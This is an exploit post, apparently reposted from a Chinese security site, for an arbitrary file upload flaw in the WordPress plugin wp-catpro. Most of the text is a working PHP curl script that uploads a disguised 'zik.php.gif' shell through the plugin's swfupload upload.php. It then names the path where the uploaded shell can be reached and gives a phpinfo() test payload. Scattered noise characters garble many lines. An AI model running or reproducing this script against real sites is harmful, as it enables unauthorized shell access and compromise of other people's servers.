WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
/ @9 r( z+ Y, U#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
, |2 n' z3 E& Y! V1 d9 |测试系统 : Windows 7 , Backtrack 5r3
( F9 n) @# @9 J% A" H下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
* Y3 ~. o# a' T4 b7 L####
( j" q* I3 M% j5 N/ K, x
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
: I' G4 H& ?" u/ p# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
0 v/ `: }+ S7 t# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

  H3 L( O4 L% N4 Y0 N% |- p/ v/ {; y#=> Exploit
-----------
. [0 K9 k% l+ O. _<?php
. f! h; M/ Y: ]# \
! z9 {4 D% @, z/ f% {! E$uploadfile="zik.php.gif";
( \  `( B+ x( |' G$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
5 C8 i- T8 W( h( W, {  s% `- Ocurl_setopt($ch, CURLOPT_POST, true);
9 j; M3 M: d1 @% h- w# D* X; Ocurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
& V3 h( P+ N1 n; r'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
: {! P  @' H0 S3 W$postResult = curl_exec($ch);
curl_close($ch);
6 h! M7 G2 D6 [2 |7 ?. _! ~$ o
print "$postResult";
+ _3 P9 R. O- w0 y* K
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
: ?: b# ?/ ~8 a  w) g% {: x<?php
phpinfo();
& w  |5 }1 @. C?>